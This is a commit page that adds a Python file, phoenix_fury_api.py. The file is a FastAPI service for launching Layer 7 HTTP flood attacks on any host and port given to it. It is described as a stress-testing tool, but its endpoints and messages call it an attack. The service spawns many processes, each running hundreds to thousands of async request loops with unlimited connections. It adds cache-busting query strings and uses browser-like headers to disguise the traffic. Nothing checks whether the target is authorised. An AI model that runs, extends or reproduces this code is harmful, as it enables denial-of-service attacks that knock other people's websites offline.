Samuraiog commited on
Commit
9cb507d
·
verified ·
1 Parent(s): 745881b

Create phoenix_fury_api.py

Browse files
Files changed (1) hide show
  1. phoenix_fury_api.py +365 -0
phoenix_fury_api.py ADDED
@@ -0,0 +1,365 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # ====================================================================================
2
+ # PHOENIX FURY API v2.0 - HIGH-RPS EDITION
3
+ #
4
+ # - RE-ARCHITECTED: Uses multiprocessing.Manager and shared memory counters
5
+ # for near-zero overhead statistics, enabling massive RPS scaling.
6
+ # - OPTIMIZED L7: Aggressive aiohttp connection pooling and a lean async
7
+ # worker loop designed for maximum request throughput.
8
+ # - SIMPLIFIED STATE: Centralized state management for instant status updates.
9
+ #
10
+ # *** BUILT FOR MAXIMUM L7 REQUESTS PER SECOND (RPS) ***
11
+ # ====================================================================================
12
+
13
+ import socket
14
+ import struct
15
+ import random
16
+ import time
17
+ import multiprocessing
18
+ import threading
19
+ import asyncio
20
+ import aiohttp
21
+ import os
22
+ import sys
23
+ import psutil
24
+ import uvloop
25
+ from typing import Literal, Optional, List
26
+ from ctypes import c_bool, c_ulonglong
27
+
28
+ # FastAPI & Pydantic
29
+ from fastapi import FastAPI, HTTPException, BackgroundTasks
30
+ from pydantic import BaseModel, Field, validator
31
+ import uvicorn
32
+
33
+ # Apply uvloop for a faster asyncio event loop
34
+ asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
35
+
36
+ # --- Application Setup & Constants ---
37
+ app = FastAPI(
38
+ title="🔥 Phoenix Fury API v2.0",
39
+ description="A high-RPS, multi-process L4/L7 stress testing tool. Re-architected for maximum performance. Requires root/admin privileges for Layer 4 attacks.",
40
+ version="2.0.0"
41
+ )
42
+ CPU_COUNT = psutil.cpu_count(logical=True)
43
+ STATS_BATCH_UPDATE_SIZE = 200 # How many requests a worker makes before updating the shared counter
44
+
45
+ # --- Realistic Browser Headers ---
46
+ USER_AGENTS = [
47
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
48
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
49
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
50
+ ]
51
+ HTTP_HEADERS = {
52
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
53
+ "Accept-Language": "en-US,en;q=0.5",
54
+ "Accept-Encoding": "gzip, deflate, br",
55
+ "Connection": "keep-alive",
56
+ "Upgrade-Insecure-Requests": "1",
57
+ "Sec-Fetch-Dest": "document",
58
+ "Sec-Fetch-Mode": "navigate",
59
+ "Sec-Fetch-Site": "none",
60
+ "Sec-Fetch-User": "?1",
61
+ "TE": "trailers",
62
+ }
63
+
64
+ # ====================================================================================
65
+ # GLOBAL SHARED STATE (HIGH PERFORMANCE)
66
+ # ====================================================================================
67
+ # Using a Manager is the cleanest way to share complex state between processes.
68
+ # For raw performance, Value/Event are used for high-frequency updates.
69
+ manager = multiprocessing.Manager()
70
+ STATE = manager.dict()
71
+ STOP_EVENT = multiprocessing.Event()
72
+ TOTAL_SENT_COUNTER = multiprocessing.Value(c_ulonglong, 0)
73
+
74
+ def reset_state():
75
+ """Resets the shared state to default values."""
76
+ STATE.clear()
77
+ STATE.update({
78
+ "attack_running": False,
79
+ "attack_type": "None",
80
+ "target_host": "None",
81
+ "target_ip": "None",
82
+ "port": 0,
83
+ "duration": 0,
84
+ "start_time": 0.0,
85
+ "processes": 0,
86
+ "current_rate": 0.0,
87
+ })
88
+ STOP_EVENT.clear()
89
+ with TOTAL_SENT_COUNTER.get_lock():
90
+ TOTAL_SENT_COUNTER.value = 0
91
+
92
+ reset_state() # Initialize on startup
93
+
94
+ # ====================================================================================
95
+ # Pydantic API Models
96
+ # ====================================================================================
97
+ class L7Config(BaseModel):
98
+ target: str = Field(..., description="Target hostname or IP address (e.g., http://example.com)")
99
+ port: int = Field(..., ge=1, le=65535, description="Target port")
100
+ duration: int = Field(..., ge=10, description="Attack duration in seconds")
101
+ processes: int = Field(CPU_COUNT, ge=1, le=CPU_COUNT*4, description=f"Number of processes to spawn. Defaults to CPU cores ({CPU_COUNT}).")
102
+ concurrency_per_process: int = Field(512, ge=1, le=4096, description="Concurrent async tasks per process.")
103
+ method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
104
+ path: str = Field("/", description="Request path")
105
+
106
+ class StatusResponse(BaseModel):
107
+ attack_running: bool
108
+ attack_type: str
109
+ target: str
110
+ port: int
111
+ duration: int
112
+ elapsed_time: float
113
+ processes: int
114
+ total_requests_sent: int
115
+ current_rate_rps: float
116
+ cpu_usage_percent: float
117
+ memory_usage_percent: float
118
+
119
+ # ====================================================================================
120
+ # CORE UTILS & NETWORKING
121
+ # ====================================================================================
122
+ def resolve_target(target: str) -> str:
123
+ """Safely resolve hostname to IP."""
124
+ try:
125
+ # Handle URLs like http://domain.com
126
+ if "://" in target:
127
+ target = target.split("://")[1].split("/")[0]
128
+ return socket.gethostbyname(target)
129
+ except socket.gaierror:
130
+ raise HTTPException(status_code=400, detail=f"Could not resolve hostname: {target}")
131
+
132
+ # ====================================================================================
133
+ # HIGH-PERFORMANCE L7 WORKER
134
+ # ====================================================================================
135
+ async def l7_task(session, url, method, stop_event, shared_counter):
136
+ """A single async task that hammers a URL in a loop."""
137
+ local_counter = 0
138
+ while not stop_event.is_set():
139
+ try:
140
+ # Add a random query param to bypass caches
141
+ request_url = f"{url}?{random.randint(1, 99999999)}"
142
+ async with session.request(method, request_url, ssl=False):
143
+ local_counter += 1
144
+ if local_counter >= STATS_BATCH_UPDATE_SIZE:
145
+ with shared_counter.get_lock():
146
+ shared_counter.value += local_counter
147
+ local_counter = 0
148
+ except Exception:
149
+ # In a stress test, we expect errors. Count them as attempts.
150
+ local_counter += 1
151
+ if local_counter >= STATS_BATCH_UPDATE_SIZE:
152
+ with shared_counter.get_lock():
153
+ shared_counter.value += local_counter
154
+ local_counter = 0
155
+ # Yield control to the event loop immediately
156
+ await asyncio.sleep(0)
157
+
158
+ # Final update before exiting
159
+ if local_counter > 0:
160
+ with shared_counter.get_lock():
161
+ shared_counter.value += local_counter
162
+
163
+ async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
164
+ """Main async function for a single worker process."""
165
+ headers = {**HTTP_HEADERS, "User-Agent": random.choice(USER_AGENTS)}
166
+
167
+ # Aggressive connector settings for high RPS
168
+ connector = aiohttp.TCPConnector(
169
+ limit_per_host=0, # No limit on connections per host
170
+ limit=None, # No limit on total connections
171
+ force_close=False, # Reuse connections
172
+ enable_keepalive=True,
173
+ use_dns_cache=True,
174
+ ttl_dns_cache=300, # Cache DNS for 5 mins
175
+ ssl=False
176
+ )
177
+
178
+ timeout = aiohttp.ClientTimeout(total=10, connect=5)
179
+
180
+ async with aiohttp.ClientSession(connector=connector, headers=headers, timeout=timeout) as session:
181
+ tasks = [
182
+ l7_task(session, url, method, stop_event, shared_counter)
183
+ for _ in range(concurrency)
184
+ ]
185
+ await asyncio.gather(*tasks)
186
+
187
+ def l7_worker_process(target_ip, port, path, method, concurrency, stop_event, shared_counter):
188
+ """The entry point for each spawned L7 attack process."""
189
+ # Construct the base URL. aiohttp handles the Host header correctly.
190
+ url = f"http://{target_ip}:{port}{path}"
191
+ try:
192
+ asyncio.run(l7_worker_main(url, method, concurrency, stop_event, shared_counter))
193
+ except KeyboardInterrupt:
194
+ pass # Allow clean exit
195
+ except Exception as e:
196
+ print(f"[Process {os.getpid()}] Worker error: {e}", file=sys.stderr)
197
+
198
+ # ====================================================================================
199
+ # ATTACK MANAGER & STATE CONTROLLER
200
+ # ====================================================================================
201
+ active_processes: List[multiprocessing.Process] = []
202
+
203
+ def start_attack(config: L7Config):
204
+ """Initiates the L7 attack."""
205
+ if STATE["attack_running"]:
206
+ print("Attack start requested, but one is already running.")
207
+ return
208
+
209
+ try:
210
+ target_ip = resolve_target(config.target)
211
+
212
+ # --- Update Global State ---
213
+ STATE["attack_running"] = True
214
+ STATE["target_host"] = config.target
215
+ STATE["target_ip"] = target_ip
216
+ STATE["port"] = config.port
217
+ STATE["duration"] = config.duration
218
+ STATE["attack_type"] = f"L7-{config.method.upper()}"
219
+ STATE["start_time"] = time.time()
220
+ STATE["processes"] = config.processes
221
+
222
+ print(f"🔥 Starting {STATE['attack_type']} attack on {STATE['target_host']}:{STATE['port']} for {STATE['duration']}s")
223
+
224
+ # --- Spawn Worker Processes ---
225
+ for _ in range(config.processes):
226
+ p = multiprocessing.Process(
227
+ target=l7_worker_process,
228
+ args=(
229
+ target_ip,
230
+ config.port,
231
+ config.path,
232
+ config.method,
233
+ config.concurrency_per_process,
234
+ STOP_EVENT,
235
+ TOTAL_SENT_COUNTER
236
+ )
237
+ )
238
+ active_processes.append(p)
239
+ p.start()
240
+
241
+ # --- Schedule the stop ---
242
+ main_thread = threading.Thread(target=timed_stop, args=(config.duration,))
243
+ main_thread.start()
244
+
245
+ except Exception as e:
246
+ print(f"Failed to start attack: {e}", file=sys.stderr)
247
+ stop_attack_immediately()
248
+
249
+
250
+ def timed_stop(duration: int):
251
+ """Waits for the duration and then stops the attack."""
252
+ time.sleep(duration)
253
+ print(f"Duration of {duration}s reached. Stopping attack.")
254
+ stop_attack_immediately()
255
+
256
+ def stop_attack_immediately():
257
+ """Stops the attack and cleans up resources."""
258
+ if not STATE["attack_running"]:
259
+ return {"status": "success", "message": "No attack was running."}
260
+
261
+ print("🛑 Sending stop signal to all worker processes...")
262
+ STOP_EVENT.set()
263
+
264
+ for p in active_processes:
265
+ p.join(timeout=5) # Give processes time to exit cleanly
266
+ if p.is_alive():
267
+ print(f"Process {p.pid} did not terminate gracefully, forcing termination.")
268
+ p.terminate()
269
+
270
+ active_processes.clear()
271
+
272
+ elapsed = time.time() - STATE['start_time']
273
+ total_sent = TOTAL_SENT_COUNTER.value
274
+ avg_rate = total_sent / elapsed if elapsed > 0 else 0
275
+ print("="*40)
276
+ print("✅ ATTACK TERMINATED.")
277
+ print(f" Total Requests: {total_sent:,}")
278
+ print(f" Elapsed Time: {elapsed:.2f} seconds")
279
+ print(f" Average Rate: {avg_rate:,.2f} RPS")
280
+ print("="*40)
281
+
282
+ reset_state()
283
+ return {"status": "success", "message": "Attack stopped."}
284
+
285
+
286
+ def stats_calculator():
287
+ """A background thread to calculate RPS continuously."""
288
+ last_check_time = time.time()
289
+ last_count = 0
290
+ while True:
291
+ time.sleep(1)
292
+ if STATE["attack_running"]:
293
+ now = time.time()
294
+ current_count = TOTAL_SENT_COUNTER.value
295
+
296
+ elapsed = now - last_check_time
297
+ if elapsed > 0:
298
+ rate = (current_count - last_count) / elapsed
299
+ STATE["current_rate"] = rate
300
+
301
+ last_check_time = now
302
+ last_count = current_count
303
+ else:
304
+ if STATE["current_rate"] != 0:
305
+ STATE["current_rate"] = 0
306
+ last_count = 0
307
+
308
+
309
+ # ====================================================================================
310
+ # FASTAPI ENDPOINTS
311
+ # ====================================================================================
312
+ @app.on_event("startup")
313
+ def on_startup():
314
+ """Start the background stats thread."""
315
+ reset_state()
316
+ stats_thread = threading.Thread(target=stats_calculator, daemon=True)
317
+ stats_thread.start()
318
+
319
+ @app.post("/attack/layer7")
320
+ def api_start_l7_attack(config: L7Config):
321
+ if STATE["attack_running"]:
322
+ raise HTTPException(status_code=409, detail="An attack is already in progress.")
323
+
324
+ # We run the attack logic in a separate thread to not block the API response
325
+ attack_thread = threading.Thread(target=start_attack, args=(config,))
326
+ attack_thread.start()
327
+
328
+ return {"status": "success", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"}
329
+
330
+ @app.post("/attack/stop")
331
+ def api_stop_attack():
332
+ if not STATE["attack_running"]:
333
+ return {"status": "info", "message": "No attack is currently running."}
334
+
335
+ response = stop_attack_immediately()
336
+ return response
337
+
338
+ @app.get("/status", response_model=StatusResponse)
339
+ def get_status():
340
+ """Provides a real-time status of the ongoing attack."""
341
+ elapsed = (time.time() - STATE["start_time"]) if STATE["attack_running"] else 0
342
+ return StatusResponse(
343
+ attack_running=STATE["attack_running"],
344
+ attack_type=STATE["attack_type"],
345
+ target=f"{STATE['target_host']} ({STATE['target_ip']})",
346
+ port=STATE["port"],
347
+ duration=STATE["duration"],
348
+ elapsed_time=round(elapsed, 2),
349
+ processes=STATE["processes"],
350
+ total_requests_sent=TOTAL_SENT_COUNTER.value,
351
+ current_rate_rps=round(STATE["current_rate"], 2),
352
+ cpu_usage_percent=psutil.cpu_percent(),
353
+ memory_usage_percent=psutil.virtual_memory().percent
354
+ )
355
+
356
+ @app.get("/")
357
+ def root():
358
+ return {"message": "🔥 Phoenix Fury API v2.0 - High-RPS Edition", "docs": "/docs"}
359
+
360
+ # --- Main Execution ---
361
+ if __name__ == "__main__":
362
+ multiprocessing.freeze_support()
363
+ print("Phoenix Fury API v2.0 starting up...")
364
+ print(f"Detected {CPU_COUNT} logical CPU cores.")
365
+ uvicorn.run(app, host="0.0.0.0", port=8000)